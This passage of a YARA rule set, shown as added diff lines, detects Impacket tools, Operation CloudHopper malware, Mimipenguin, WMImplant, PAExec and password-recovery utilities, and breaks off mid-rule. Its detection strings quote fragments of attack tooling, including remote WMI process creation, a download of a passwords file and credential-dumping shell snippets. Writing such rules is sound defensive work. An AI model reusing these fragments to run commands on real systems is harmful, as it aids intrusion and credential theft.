+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 12:05:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "bopdump.exe.manifest" fullword ascii
+      $s3 = "sopdump" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+}
+
+rule Impacket_Tools_smbtorture_RID3165 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 13:20:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "impacket" fullword ascii
+      $s2 = "ssmbtorture" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+}
+
+rule Impacket_Tools_mimikatz_RID3074 : DEMO EXE FILE HKTL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 12:40:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
+      tags = "DEMO, EXE, FILE, HKTL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "impacket" fullword ascii
+      $s2 = "smimikatz" fullword ascii
+      $s3 = "otwsdlc" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+}
+
+rule Impacket_Tools_lookupsid_RID30E8 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 12:59:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "47756725d7a752d3d3cfccfb02e7df4fa0769b72e008ae5c85c018be4cf35cc1"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "slookupsid" fullword ascii
+      $s2 = "impacket.dcerpc" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+}
+
+rule Impacket_Tools_atexec_RID2F88 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 12:01:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "337bd5858aba0380e16ee9a9d8f0b3f5bfc10056ced4e75901207166689fbedc"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "batexec.exe.manifest" fullword ascii
+      $s2 = "satexec" fullword ascii
+      $s3 = "impacket.dcerpc" fullword ascii
+      $s4 = "# CSZq" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 15000KB and 3 of them )
+}
+
+rule Impacket_Tools_Generic_1_RID305B : DEMO EXE FILE GEN HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 12:36:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
+      hash2 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
+      hash3 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
+      tags = "DEMO, EXE, FILE, GEN, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "bpywintypes27.dll" fullword ascii
+      $s2 = "hZFtPC" fullword ascii
+      $s3 = "impacket" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 21000KB and all of ( $s* ) ) or ( all of them )
+}
+
+rule OpCloudHopper_Malware_1_RID2FED : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "27876dc5e6f746ff6003450eeea5e98de5d96cbcba9e4694dad94ca3e9fb1ddc"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+      $s2 = "z{[ZZYUKKKIIGGGGGGGGGGGGG" fullword ascii
+      $s3 = "EEECEEC" fullword ascii
+      $s4 = "IIEFEE" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule OpCloudHopper_Malware_2_RID2FEE : DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:18:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064"
+      tags = "DEMO, EXE, FILE, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "sERvEr.Dll" fullword ascii
+      $x2 = "ToolbarF.dll" fullword wide
+      $x3 = ".?AVCKeyLoggerManager@@" fullword ascii
+      $x4 = "GH0STCZH" ascii
+      $s1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword wide
+      $s2 = "rundll32.exe \"%s\", UnInstall /update %s" fullword wide
+      $s3 = "\\Release\\Loader.pdb" ascii
+      $s4 = "%s\\%x.dll" fullword wide
+      $s5 = "Mozilla/4.0 (compatible)" fullword wide
+      $s6 = "\\syslog.dat" wide
+      $s7 = "NSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+      $op1 = { 8d 34 17 8d 49 00 8a 14 0e 3a 14 29 75 05 41 3b } 
+      $op2 = { 83 e8 14 78 cf c1 e0 06 8b f8 8b c3 8a 08 84 c9 } 
+      $op3 = { 3b fb 7d 3f 8a 4d 14 8d 45 14 84 c9 74 1b 8a 14 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) or all of ( $op* ) ) or ( 6 of them )
+}
+
+rule OpCloudHopper_Malware_3_RID2FEF : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:18:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "operator \"\" " fullword ascii
+      $s7 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+      $s11 = "InvokeMainViaCRT" fullword ascii
+      $s12 = ".?AVAES@@" fullword ascii
+      $op1 = { b6 4c 06 f5 32 cf 88 4c 06 05 0f b6 4c 06 f9 32 } 
+      $op2 = { 06 fc eb 03 8a 5e f0 85 c0 74 05 8a 0c 06 eb 03 } 
+      $op3 = { 7e f8 85 c0 74 06 8a 74 06 08 eb 03 8a 76 fc 85 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( all of ( $s* ) and 1 of ( $op* ) ) or all of ( $op* ) ) or ( 5 of them )
+}
+
+rule OpCloudHopper_Dropper_1_RID3000 : DEMO FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:21:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "411571368804578826b8f24f323617f51b068809b1c769291b21125860dc3f4e"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "{\\version2}{\\edmins0}{\\nofpages1}{\\nofwords11}{\\nofchars69}{\\*\\company google}{\\nofcharsws79}{\\vern24611}{\\*\\password" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5c7b and filesize < 700KB and all of them )
+}
+
+rule OpCloudHopper_Malware_4_RID2FF0 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:18:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "ae6b45a92384f6e43672e617c53a44225e2944d66c1ffb074694526386074145"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "operator \"\" " fullword ascii
+      $s9 = "InvokeMainViaCRT" fullword ascii
+      $s10 = ".?AVAES@@" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of them )
+}
+
+rule OpCloudHopper_Malware_5_RID2FF1 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:18:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "CWINDOWSSYSTEMROOT" fullword ascii
+      $x2 = "YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK" fullword ascii
+      $x3 = "NJK_JK_SED_PNJHGFUUGIOO_PIY" fullword ascii
+      $x4 = "c_VDGQBUl}YSB_C_VDlqSDYFU" fullword ascii
+      $s7 = "FALLINLOVE" fullword ascii
+      $op1 = { 83 ec 60 8d 4c 24 00 e8 6f ff ff ff 8d 4c 24 00 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 4 of them )
+}
+
+rule OpCloudHopper_Malware_6_RID2FF2 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:18:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "YDNCCOVZKXGRVQPOBRNXXQVNQYXBBCONCOQEGYELIRBEYOVODGXCOXTHXPCXNGUCHRVWKKZSYQMAOWWGHRSPRGSEUWYMEFZHRTHO" fullword ascii
+      $s2 = "psychiatry.dat" fullword ascii
+      $s3 = "meekness.lnk" fullword ascii
+      $s4 = "SOFTWARE\\EGGORG" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule OpCloudHopper_Malware_7_RID2FF3 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:19:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "44a7bea8a08f4c2feb74c6a00ff1114ba251f3dc6922ea5ffab9e749c98cbdce"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "jepsjepsjepsjepsjepsjepsjepsjepsjepsjeps" fullword ascii
+      $x2 = "extOextOextOextO" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule OpCloudHopper_Malware_8_RID2FF4 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:19:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "19aa5019f3c00211182b2a80dd9675721dac7cfb31d174436d3b8ec9f97d898b"
+      hash2 = "5cebc133ae3b6afee27beb7d3cdb5f3d675c3f12b7204531f453e99acdaa87b1"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WSHELL32.dll" fullword wide
+      $s2 = "operator \"\" " fullword ascii
+      $s3 = "\" /t REG_SZ /d \"" fullword wide
+      $s4 = " /f /v \"" fullword wide
+      $s5 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+      $s6 = "AFX_DIALOG_LAYOUT" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and 4 of them )
+}
+
+rule OpCloudHopper_Malware_9_RID2FF5 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:19:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f0002b912135bcee83f901715002514fdc89b5b8ed7585e07e482331e4a56c06"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "MsMpEng.exe" fullword ascii
+      $op0 = { 2b c7 50 e8 22 83 ff ff ff b6 c0 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule OpCloudHopper_Malware_10_RID301D : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:26:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5b4028728d8011a2003b7ce6b9ec663dd6a60b7adcc20e2125da318e2d9e13f4"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "bakshell.EXE" fullword wide
+      $s19 = "bakshell Applicazione MFC" fullword wide
+      $op0 = { 83 c4 34 c3 57 8b ce e8 92 18 00 00 68 20 70 40 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
+rule OpCloudHopper_Malware_11_RID301E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Operation CloudHopper malware samples"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+      date = "2017-04-03 12:26:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a80f6c57f772f20d63021c8971a280c19e8eafe7cc7088344c598d84026dda15"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "IOGVWDWCXZVRHTE" fullword ascii
+      $op1 = { c9 c3 56 6a 00 8b f1 6a 64 e8 dd 34 00 00 c7 06 } 
+      $op2 = { 68 38 00 41 00 68 34 00 41 00 e8 d3 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
+rule Mimipenguin_SH_RID2C8D : DEMO HKTL LINUX SCRIPT T1003 {
+   meta:
+      description = "Detects Mimipenguin Password Extractor - Linux"
+      author = "Florian Roth"
+      reference = "https://github.com/huntergregal/mimipenguin"
+      date = "2017-04-01 09:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, LINUX, SCRIPT, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$(echo $thishash | cut -d'$' -f 3)" ascii
+      $s2 = "ps -eo pid,command | sed -rn '/gnome\\-keyring\\-daemon/p' | awk" ascii
+      $s3 = "MimiPenguin Results:" ascii
+   condition: 
+      1 of them
+}
+
+rule Invoke_OSiRis_RID2C15 : DEMO SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Osiris Device Guard Bypass - file Invoke-OSiRis.ps1"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-27 09:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e"
+      tags = "DEMO, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target" fullword ascii
+      $x2 = "Invoke-OSiRis" ascii
+      $x3 = "-Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}" fullword ascii
+      $x4 = "Device Guard Bypass Command Execution" fullword ascii
+      $x5 = "-Put Payload in Win32_OSRecoveryConfiguration DebugFilePath" fullword ascii
+      $x6 = "$null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule PAExec_RID2927 : DEMO EXE FILE HKTL T1035 T1077 {
+   meta:
+      description = "Detects remote access tool PAEXec (like PsExec) - file PAExec_RID2927.exe"
+      author = "Florian Roth"
+      reference = "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/"
+      date = "2017-03-27 20:50:01"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc"
+      tags = "DEMO, EXE, FILE, HKTL, T1035, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Ex: -rlo C:\\Temp\\PAExec_RID2927.log" fullword ascii
+      $x2 = "Can't enumProcesses - Failed to get token for Local System." fullword wide
+      $x3 = "PAExec_RID2927 %s - Execute Programs Remotely" fullword wide
+      $x4 = "\\\\%s\\pipe\\PAExec_RID2927In%s%u" fullword wide
+      $x5 = "\\\\.\\pipe\\PAExec_RID2927In%s%u" fullword wide
+      $x6 = "%%SystemRoot%%\\%s.exe" fullword wide
+      $x7 = "in replacement for PsExec, so the command-line usage is identical, with " fullword ascii
+      $x8 = "\\\\%s\\ADMIN$\\PAExec_RID2927_Move%u.dat" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule Malware_JS_powershell_obfuscated_RID33F9 : DEMO MAL OBFUS SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Unspecified malware - file rechnung_3.js"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-24 15:10:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3af15a2d60f946e0c4338c84bd39880652f676dc884057a96a10d7f802215760"
+      tags = "DEMO, MAL, OBFUS, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "po\" + \"wer\" + \"sh\" + \"e\" + \"ll\";" fullword ascii
+   condition: 
+      filesize < 30KB and 1 of them
+}
+
+rule WMImplant_RID2A8A : DEMO SCRIPT T1047 T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects WMI implant- file WMImplant_RID2A8A.ps1"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
+      date = "2017-03-24 06:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78"
+      tags = "DEMO, SCRIPT, T1047, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke-ProcessPunisher -Creds $RemoteCredential" fullword ascii
+      $x2 = "$Target -query \"SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')" ascii
+      $x3 = "WMImplant_RID2A8A -Creds" fullword ascii
+      $x4 = "-Download -RemoteFile C:\\passwords.txt" ascii
+      $x5 = "-Command 'powershell.exe -command \"Enable-PSRemoting" fullword ascii
+      $x6 = "Invoke-WMImplant_RID2A8A" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule BeyondExec_RemoteAccess_Tool_RID3211 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects BeyondExec Remote Access Tool - file rexesvr.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/BvYurS"
+      date = "2017-03-17 13:49:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii
+      $x2 = "\\\\.\\pipe\\beyondexec%d-stdin" fullword ascii
+      $x3 = "Failed to create dispatch pipe. Do you have another instance running?" fullword ascii
+      $op1 = { 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 80 6f 40 } 
+      $op2 = { 6a 40 33 c0 59 bf e0 d8 40 00 f3 ab 8d 0c 52 c1 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $op* ) ) ) or ( 3 of them )
+}
+
+rule WPR_loader_DLL_RID2C1B : DEMO EXE FILE HKTL {
+   meta:
+      description = "Windows Password Recovery - file loader64.dll"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-15 09:35:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7b074cb99d45fc258e0324759ee970467e0f325e5d72c0b046c4142edc6776f6"
+      hash2 = "a1f27f7fd0e03601a11b66d17cfacb202eacf34f94de3c4e9d9d39ea8d1a2612"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "loader64.dll" fullword ascii
+      $x2 = "loader.dll" fullword ascii
+      $s1 = "TUlDUk9TT0ZUX0FVVEhFTlRJQ0FUSU9OX1BBQ0tBR0VfVjFfMA==" fullword ascii
+      $s2 = "UmVtb3RlRGVza3RvcEhlbHBBc3Npc3RhbnRBY2NvdW50" fullword ascii
+      $s3 = "U2FtSVJldHJpZXZlUHJpbWFyeUNyZWRlbnRpYWxz" fullword ascii
+      $s4 = "VFM6SW50ZXJuZXRDb25uZWN0b3JQc3dk" fullword ascii
+      $s5 = "TCRVRUFjdG9yQWx0Q3JlZFByaXZhdGVLZXk=" fullword ascii
+      $s6 = "YXNwbmV0X1dQX1BBU1NXT1JE" fullword ascii
+      $s7 = "TCRBTk1fQ1JFREVOVElBTFM=" fullword ascii
+      $s8 = "RGVmYXVsdFBhc3N3b3Jk" fullword ascii
+      $op0 = { 48 8b cd e8 e0 e8 ff ff 48 89 07 48 85 c0 74 72 } 
+      $op1 = { e8 ba 23 00 00 33 c9 ff 15 3e 82 } 
+      $op2 = { 48 83 c4 28 e9 bc 55 ff ff 48 8d 0d 4d a7 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $s* ) and all of ( $op* ) ) )
+}
+
+rule WPR_Asterisk_Hook_Library_RID30D3 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Windows Password Recovery - file ast64.dll"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-15 12:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "225071140e170a46da0e57ce51f0838f4be00c8f14e9922c6123bee4dffde743"
+      hash2 = "95ec84dc709af990073495082d30309c42d175c40bd65cad267e6f103852a02d"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ast64.dll" fullword ascii
+      $s2 = "ast.dll" fullword wide
+      $s3 = "c:\\%s.lvc" fullword ascii
+      $s4 = "c:\\%d.lvc" fullword ascii
+      $s5 = "Asterisk Hook Library" fullword wide
+      $s6 = "?Ast_StartRd64@@YAXXZ" fullword ascii
+      $s7 = "Global\\{1374821A-281B-9AF4-%04X-12345678901234}" fullword ascii
+      $s8 = "2004-2013 Passcape Software" fullword wide
+      $s9 = "Global\\Passcape#6712%04X" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+}
+
+rule WPR_WindowsPasswordRecovery_EXE_RID3337 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Windows Password Recovery - file wpr.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-15 14:38:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c1c64cba5c8e14a1ab8e9dd28828d036581584e66ed111455d6b4737fb807783"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "UuPipe" fullword ascii
+      $x2 = "dbadllgl" fullword ascii
+      $x3 = "UkVHSVNUUlkgTU9O" fullword ascii
+      $x4 = "RklMRSBNT05JVE9SIC0gU1l" fullword ascii
+      $s1 = "WPR.exe" fullword wide
+      $s2 = "Windows Password Recovery" fullword wide
+      $op0 = { 5f df 27 17 89 } 
+      $op1 = { 5f 00 00 f2 e5 cb 97 } 
+      $op2 = { e8 ed 00 f0 cc e4 00 a0 17 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20000KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $op* ) )
+}
+
+rule WPR_WindowsPasswordRecovery_EXE_64_RID3400 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Windows Password Recovery - file ast64.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-15 15:11:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4e1ea81443b34248c092b35708b9a19e43a1ecbdefe4b5180d347a6c8638d055"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%B %d %Y  -  %H:%M:%S" fullword wide
+      $op0 = { 48 8d 8c 24 50 22 00 00 e8 bf eb ff ff 4c 8b c7 } 
+      $op1 = { ff 15 16 25 01 00 f7 d8 1b } 
+      $op2 = { e8 c2 26 00 00 83 20 00 83 c8 ff 48 8b 5c 24 30 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule StoneDrill_BAT_1_RID2CD7 : APT DEMO FILE MIDDLE_EAST SCRIPT {
+   meta:
+      description = "Rule to detect Batch file from StoneDrill report"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
